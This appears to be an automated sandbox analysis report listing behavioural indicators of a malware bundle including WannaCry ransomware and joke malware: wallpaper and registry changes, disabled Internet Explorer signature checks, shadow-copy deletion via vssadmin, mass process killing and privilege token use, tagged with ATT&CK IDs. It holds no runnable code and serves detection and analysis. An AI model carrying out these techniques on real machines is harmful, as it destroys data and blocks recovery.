Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	wannacryptor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Program Files directory 64 IoCs

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jre7\bin\java.exe	attrib.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PROFILE\PROFILE.INF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF	attrib.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099176.WMF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105360.WMF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.DPV	attrib.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\wmpnssci.dll.mui	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\winamp2.xml	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFL.ICO	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF	attrib.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\PresentationBuildTasks.resources.dll	attrib.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Hovd	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs	attrib.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\Seyes.jtp	attrib.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js	attrib.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\attention.gif	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\STSCOPY.DLL	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml	attrib.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\it-IT\Hearts.exe.mui	attrib.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\wmpnscfg.exe.mui	attrib.exe
File opened for modification	C:\Program Files\Windows NT\Accessories	attrib.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ11.POC	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnWD.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\XLLEX.DLL	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png	attrib.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\es-ES\Hearts.exe.mui	attrib.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Hand Prints.htm	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.jpg	attrib.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\dnsns.jar	attrib.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\currency.js	attrib.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\NETWORK\PREVIEW.GIF	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp	attrib.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Engine.resources.dll	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBRV.XML	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\zh_TW	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC.HXS	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\FLASH.NET.XML	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V	attrib.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	attrib.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\SetupMetrics	attrib.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Minsk	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html	attrib.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS	attrib.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-i..gbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1eab13b65d3f791e.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-help-instmes.resources_31bf3856ad364e35_6.1.7600.16385_en-us_187b610e0e5d12af\instmes.h1s	attrib.exe
File opened for modification	C:\Windows\inf\prnep003.PNF	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\x86_microsoft-windows-w..ar-wizard.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_12acf8f0cff01737.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-h..-helpcins.resources_31bf3856ad364e35_6.1.7600.16385_it-it_71bed0b132a65a99.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-wmi-tools.resources_31bf3856ad364e35_6.1.7601.17514_de-de_fcac35d84c35c084.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_Signing.help.txt	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-wmi-mof_31bf3856ad364e35_6.1.7600.16385_none_fe6bb73bc9e20a39\secrcw32.mof	attrib.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-fmifs_31bf3856ad364e35_6.1.7600.16385_none_b303632c4b483c6c.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_avmx64c.inf-languagepack_31bf3856ad364e35_6.1.7600.16385_en-us_cbc5e4bb223ed3f0.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-appwiz_31bf3856ad364e35_6.1.7601.17514_none_69ec3dec3d85b086.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\msil_microsoft.web.management.iis.resources_31bf3856ad364e35_6.1.7600.16385_es-es_145dba5b8aafa6fb.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-vssapi.resources_31bf3856ad364e35_6.1.7600.16385_en-us_e5666bc434880c14_vsstrace.dll.mui_3a1fe238	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\wow64_microsoft-windows-i..ntication.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_03c1b3a5a5f8a8d3.manifest	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\WebAdminHelp_Application.aspx.fr.resx	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-font-truetype-georgia_31bf3856ad364e35_6.1.7600.16385_none_8ceadd6195267598\georgiaz.ttf	attrib.exe
File opened for modification	C:\Windows\winsxs\Catalogs\3a6eb806e3849a02d9fbdf80d065be28b3b7fc33d65531b1a3ddee7bb6ee851c.cat	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-c..ilter-rtf.resources_31bf3856ad364e35_7.0.7600.16385_es-es_e35899256c34d6f6.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-browseui_31bf3856ad364e35_6.1.7601.17514_none_8f08e721fcf5575d\browseui.dll	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_prnep00b.inf_31bf3856ad364e35_6.1.7600.16385_none_ad2d68ddc89d49d5\Amd64\EP0NGP9H.GPD	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\x86_microsoft-windows-n..ients-svc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5fc520ff0afb6e0d.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_rawsilo.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_77e7f5ba072f39ad\rawsilo.inf_loc	attrib.exe
File opened for modification	C:\Windows\winsxs\FileMaps\$$_system32_networklist_029a48465a9cac56.cdf-ms	attrib.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.Resources\1.0.0.0_it_31bf3856ad364e35\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.resources.dll	attrib.exe
File opened for modification	C:\Windows\Fonts\8514fix.fon	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_6.1.7600.16385_none_70644a8bdb0d9303\cga40woa.fon	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_wiabr005.inf-languagepack_31bf3856ad364e35_6.1.7600.16385_it-it_45f6422fbf4ca6e0.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-s..spp-tools.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84dd12e1988d1a10.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\wow64_ehome-bdatunepia_31bf3856ad364e35_6.1.7601.17514_none_5621eb4f9854b9af.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\wow64_bth-user.resources_31bf3856ad364e35_6.1.7600.16385_en-us_cd0412cbc6ff5922\bthprops.cpl.mui	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_acpi.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_3e7818a79fdc0ad5\acpi.sys.mui	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\x86_microsoft-windows-cttunesvr.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_f25caaa972fa6e16.manifest	attrib.exe
File opened for modification	C:\Windows\Fonts\upcei.ttf	attrib.exe
File opened for modification	C:\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~en-GB~7.1.7601.16492.mum	attrib.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-advapi32.resources_31bf3856ad364e35_6.1.7600.16385_it-it_0129330494b0e3c3.manifest	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardAddUser.ascx.fr.resx	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_6.1.7601.17514_none_288b7acec3a75696.manifest	attrib.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.Resources	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_ntprint.inf_31bf3856ad364e35_6.1.7601.17514_none_9926a270d1526b79\Amd64\STDSCHMX.GDL	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-t..workspace.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_0f6358929de99b95.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\msil_microsoft.web.manag..iisclient.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_eee1b8980a177ed6.manifest	attrib.exe
File opened for modification	C:\Windows\Fonts\ssef1255.fon	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-wlanui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_82efffc4fc376e66\wlanui.dll.mui	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_ph3xibc10.inf_31bf3856ad364e35_6.1.7600.16385_none_12b403556d5e12e6\Ph3xIBC10.inf	attrib.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..-downlevelmanifests_31bf3856ad364e35_6.1.7601.17514_none_609ebaed9a394a1c\shell32-DL.man	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-r..e-rassstp.resources_31bf3856ad364e35_6.1.7600.16385_es-es_449f95d072a7ae4d.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-w..e-utility.resources_31bf3856ad364e35_6.1.7600.16385_it-it_e7fce109a52b1c6a.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-help-sharing.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_631f27f540ebcb53\sharing.h1s	attrib.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-advapi32_31bf3856ad364e35_6.1.7600.16385_none_3f3d4351a032bf57_advapi32.dll_9512793c	attrib.exe
File opened for modification	C:\Windows\winsxs\Catalogs\d49c8b374fb6378947fa47afcb2624a431007898b198f070be56f2cd068caa43.cat	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\x86_microsoft-windows-d..ment-core.resources_31bf3856ad364e35_6.1.7600.16385_en-us_11c8098e228f7a96.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_6.1.7600.16385_none_59590e92c817a4e0\vga857.fon	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-help-network.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c05c217977399b7f\network.h1s	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_6.1.7600.16385_it-it_9e5b45457e71d50c\Report.System.Diagnostics.xml	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-wmi-mof_31bf3856ad364e35_6.1.7600.16385_none_fe6bb73bc9e20a39\WBEMCons.mof	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_6.1.7601.17514_none_1202940e4711971e\Report.System.Diagnostics.xml	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_win7-microsoft-wind..oyment-languagepack_31bf3856ad364e35_7.1.7601.16492_lv-lv_5a2646174daf6e06.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-i..tbranding.resources_31bf3856ad364e35_8.0.7600.16385_it-it_f998bb70621dfc39\iedkcs32.dll.mui	attrib.exe
File opened for modification	C:\Windows\winsxs\wow64_microsoft-windows-iis-ftpsvc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_d2857e8176c21a5b\ftpsvc.mfl	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-shell32_31bf3856ad364e35_6.1.7601.17514_none_ca4f304d289b7800.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\x86_microsoft-windows-smartcardplugins_31bf3856ad364e35_6.1.7601.17514_none_1d73fbd47d98eb68.manifest	attrib.exe
File opened for modification	C:\Windows\winsxs\Manifests\amd64_microsoft-windows-i..ard-japanese_nec-at_31bf3856ad364e35_6.1.7600.16385_none_a47030bcada37eea.manifest	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1700	2144	WerFault.exe	YouAreAnIdiot.exe
1484	1704	WerFault.exe	YouAreAnIdiot.exe
1316	1724	WerFault.exe	YouAreAnIdiot.exe
380	2296	WerFault.exe	YouAreAnIdiot.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1576 timeout.exe
2116 timeout.exe
1800 timeout.exe
3312 timeout.exe
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exe

pid process

2840 vssadmin.exe

pid	process
1576	timeout.exe
2116	timeout.exe
1800	timeout.exe
3312	timeout.exe

pid	process
2840	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2416	taskkill.exe
1220	taskkill.exe
3024	taskkill.exe
780	taskkill.exe
2884	taskkill.exe
1652	taskkill.exe
1820	taskkill.exe
3716	taskkill.exe
3760	taskkill.exe
1036	taskkill.exe
2152	taskkill.exe
1256	taskkill.exe
3044	taskkill.exe
1588	taskkill.exe
1840	taskkill.exe
2920	taskkill.exe
3928	taskkill.exe
2828	taskkill.exe
2440	taskkill.exe
1316	taskkill.exe
2380	taskkill.exe
1260	taskkill.exe
1184	taskkill.exe
2672	taskkill.exe
560	taskkill.exe
2628	taskkill.exe
2004	taskkill.exe
1544	taskkill.exe
2084	taskkill.exe
2628	taskkill.exe
1780	taskkill.exe
1136	taskkill.exe
2788	taskkill.exe
3996	taskkill.exe
840	taskkill.exe
1100	taskkill.exe
1804	taskkill.exe
2124	taskkill.exe
2588	taskkill.exe
2496	taskkill.exe
560	taskkill.exe
1780	taskkill.exe
1820	taskkill.exe
1592	taskkill.exe
2168	taskkill.exe
2936	taskkill.exe
1200	taskkill.exe
1260	taskkill.exe
1184	taskkill.exe
1388	taskkill.exe
3332	taskkill.exe
1828	taskkill.exe
2768	taskkill.exe
1108	taskkill.exe
2588	taskkill.exe
2872	taskkill.exe
2920	taskkill.exe
3252	taskkill.exe
2728	taskkill.exe
1824	taskkill.exe
2924	taskkill.exe
1880	taskkill.exe
1052	taskkill.exe
2564	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

win7recovery.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	win7recovery.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Download	win7recovery.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2304 reg.exe
Runs net.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2304	reg.exe

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

win7recovery.exeWbVhxCIDDK.exetaskhsvc.exe

pid	process
2864	win7recovery.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
1588	taskhsvc.exe
1588	taskhsvc.exe
2864	win7recovery.exe
1588	taskhsvc.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
1220	WbVhxCIDDK.exe
2864	win7recovery.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

win7recovery.exe

pid process

2864 win7recovery.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exeshutdown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeshutdown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	2828	taskkill.exe
Token: SeShutdownPrivilege	2772	shutdown.exe
Token: SeRemoteShutdownPrivilege	2772	shutdown.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	780	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	1200	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeShutdownPrivilege	2092	shutdown.exe
Token: SeRemoteShutdownPrivilege	2092	shutdown.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1220	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeDebugPrivilege	3716	taskkill.exe
Token: SeDebugPrivilege	3760	taskkill.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

jokewarehydra.exe@[email protected]win7recovery.exeWScript.exe

pid process

1796 jokewarehydra.exe
1796 jokewarehydra.exe
1916 @[email protected]
2864 win7recovery.exe
3680 WScript.exe

pid	process
1796	jokewarehydra.exe
1796	jokewarehydra.exe
1916	@[email protected]
2864	win7recovery.exe
3680	WScript.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
3200	@[email protected]
3220	@[email protected]
3220	@[email protected]
3200	@[email protected]
1916	@[email protected]
1916	@[email protected]
3352	@[email protected]
